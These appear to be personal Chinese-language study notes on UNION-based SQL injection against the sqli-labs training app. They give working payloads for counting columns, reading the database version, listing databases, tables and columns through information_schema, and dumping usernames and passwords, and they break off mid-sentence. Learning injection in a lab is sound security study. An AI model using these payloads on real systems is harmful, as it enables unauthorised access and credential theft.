SQL注入1.0
id title content time author
select * from new where id=1?
select 联合查询 union
order by 排序 先知道有几列 在联合查询
version 版本号
前后两个语句都对就显示ID了,把不要查的报错后面的版本信息就出来了id=-1 union select 1,2 ,version()
查询数据库中所有的库名
http://10.1.2.5:10631/sqli/Less-2/?id=-1 union select 1,database(),group_concat(schema_name) from information_schema.schemata 所有的库名
http://10.1.2.5:10631/sqli/Less-2/?id=-1 union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='security' 表名
schemate 保存所有数据库的名字 tables 保存所有的表的名字 column 保存所有的字段的名字
id=-1 union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='users' 列名
schemata
库名.表名
union select 1,2,group_concat(SCHEMA_NAME) from information_schema.schemata
、、查询所有的表
union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = database()
查询当前库中某一个表的所有列 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = 'users'
group_concat schema.schemata SCHEMA_NAME
查字段的内容union select 1,group_concat(username),group_concat(password) from security.users 或者 union select 1,2,group_concat(username, '-',password) from users
查询所有的咧 select column_name from